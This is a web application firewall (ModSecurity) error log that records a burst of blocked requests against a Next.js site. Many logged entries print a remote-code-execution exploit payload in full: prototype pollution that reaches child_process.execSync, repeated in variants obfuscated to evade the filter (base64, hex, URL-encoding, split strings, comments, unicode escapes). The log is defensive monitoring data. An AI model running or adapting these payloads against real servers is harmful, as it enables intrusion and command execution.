"(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/_next/data"] [unique_id "adJmzrxQSOrq_iRTM7dqFAAAAQo"] [Sun Apr 05 15:42:38.392390 2026] [:error] [pid 13019:tid 13262] [client 172.94.9.253:44970] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(Buffer.from('ZWNobyAkKCg0MSoyNzEpKQ==','base64').toString()).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/session"] [unique_id "adJmzrxQSOrq_iRTM7dqFwAAARY"] [Sun Apr 05 15:42:38.396938 2026] [:error] [pid 13019:tid 13244] [client 172.94.9.253:44962] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/api"] [unique_id "adJmzrxQSOrq_iRTM7dqGAAAAQQ"] [Sun Apr 05 15:42:38.416186 2026] [:error] [pid 13019:tid 13245] [client 172.94.9.253:44996] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:0 outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms.dev-unit.com"] [uri "/api/auth/session"] [unique_id "adJmzrxQSOrq_iRTM7dqGgAAAQU"] [Sun Apr 05 15:42:38.427856 2026] [:error] [pid 23077:tid 23094] [client 172.94.9.253:45028] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var/*bypass*/res=process.mainModule.require(/*waf*/'child_process'/*bypass*/).execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_f..."] [sever [hostname "cms.dev-unit.com"] [uri "/de"] [unique_id "adJmzpc83uMXRUE9zvQTJgAAAcs"] [Sun Apr 05 15:42:38.427858 2026] [:error] [pid 13019:tid 13243] [client 172.94.9.253:44986] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(Buffer.from('6563686f2024282834312a3237312929','hex').toString()).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/session"] [unique_id "adJmzrxQSOrq_iRTM7dqGwAAAQM"] [Sun Apr 05 15:42:38.431693 2026] [:error] [pid 13019:tid 13251] [client 172.94.9.253:45012] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/session"] [unique_id "adJmzrxQSOrq_iRTM7dqHAAAAQs"] [Sun Apr 05 15:42:38.435236 2026] [:error] [pid 13019:tid 13258] [client 172.94.9.253:44982] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('chi' 'ld_' 'pro' 'cess').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/session"] [unique_id "adJmzrxQSOrq_iRTM7dqHQAAARI"] [Sun Apr 05 15:42:38.458489 2026] [:error] [pid 13019:tid 13256] [client 172.94.9.253:45034] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var r=process.mainModule.require('child_process').spawnSync('sh',['-c','echo $((41*271))']);var res=r.stdout.toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/session"] [unique_id "adJmzrxQSOrq_iRTM7dqHgAAARA"] [Sun Apr 05 15:42:38.473558 2026] [:error] [pid 13019:tid 13250] [client 172.94.9.253:45042] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var\\x5ctres=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw\\x5ctObject.assign(new\\x5ctError('NEXT_REDIRECT'),{digest:\\x5ct`NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/session"] [unique_id "adJmzrxQSOrq_iRTM7dqHwAAAQo"] [Sun Apr 05 15:42:38.473564 2026] [:error] [pid 31198:tid 31272] [client 172.94.9.253:45058] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var/*bypass*/res=process.mainModule.require(/*waf*/'child_process'/*bypass*/).execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_f..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/session"] [unique_id "adJmzjT5TgrBR8xRnfXA_gAAAVQ"] [Sun Apr 05 15:42:38.519868 2026] [:error] [pid 31198:tid 31276] [client 172.94.9.253:45062] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var\\x5ctres=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw\\x5ctObject.assign(new\\x5ctError('NEXT_REDIRECT'),{digest:\\x5ct`NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/fr"] [unique_id "adJmzjT5TgrBR8xRnfXA_wAAAVg"] [Sun Apr 05 15:42:38.529858 2026] [:error] [pid 22788:tid 22804] [client 172.94.9.253:45038] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/register"] [unique_id "adJmziLbhFL16Wsx-C9DCQAAAY4"] [Sun Apr 05 15:42:38.537400 2026] [:error] [pid 23077:tid 23098] [client 172.94.9.253:45094] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/fr"] [unique_id "adJmzpc83uMXRUE9zvQTKAAAAc8"] [Sun Apr 05 15:42:38.584592 2026] [:error] [pid 13019:tid 13245] [client 172.94.9.253:45108] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(Buffer.from('ZWNobyAkKCg0MSoyNzEpKQ==','base64').toString()).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/fr"] [unique_id "adJmzrxQSOrq_iRTM7dqIAAAAQU"] [Sun Apr 05 15:42:38.589902 2026] [:error] [pid 31198:tid 31270] [client 172.94.9.253:45080] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(decodeURIComponent(decodeURIComponent('echo%20%24%28%2841%2A271%29%29'))).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_c..."] [sever [hostname "cms.dev-unit.com"] [uri "/fr"] [unique_id "adJmzjT5TgrBR8xRnfXBAAAAAVI"] [Sun Apr 05 15:42:38.589947 2026] [:error] [pid 13019:tid 13243] [client 172.94.9.253:45066] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22$K4\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:const..."] [sever [hostname "cms.dev-unit.com"] [uri "/fr"] [unique_id "adJmzrxQSOrq_iRTM7dqIQAAAQM"] [Sun Apr 05 15:42:38.590176 2026] [:error] [pid 13019:tid 13242] [client 172.94.9.253:45118] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:0 outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms.dev-unit.com"] [uri "/fr"] [unique_id "adJmzrxQSOrq_iRTM7dqIgAAAQI"] [Sun Apr 05 15:42:38.612225 2026] [:error] [pid 31198:tid 31273] [client 172.94.9.253:45120] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(Buffer.from('6563686f2024282834312a3237312929','hex').toString()).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/fr"] [unique_id "adJmzjT5TgrBR8xRnfXBAgAAAVU"] [Sun Apr 05 15:42:38.638854 2026] [:error] [pid 13019:tid 13256] [client 172.94.9.253:45154] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22:\\x22$1:__proto__:then\\x22,\\x22\\x5cu0073\\x5cu0074\\x5cu0061\\x5cu0074\\x5cu0075\\x5cu0073\\x22:\\x22resolved_model\\x22,\\x22\\x5cu0072\\x5cu0065\\x5cu0061\\x5cu0073\\x5cu006f\\x5cu006e\\x22:-1,\\x22\\x5cu0076\\x5cu0061\\x5cu006c\\x5cu0075\\x5cu0065\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim(..."] [sever [hostname "cms.dev-unit.com"] [uri "/fr"] [unique_id "adJmzrxQSOrq_iRTM7dqJAAAARA"] [Sun Apr 05 15:42:38.638859 2026] [:error] [pid 23077:tid 23096] [client 172.94.9.253:45142] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| 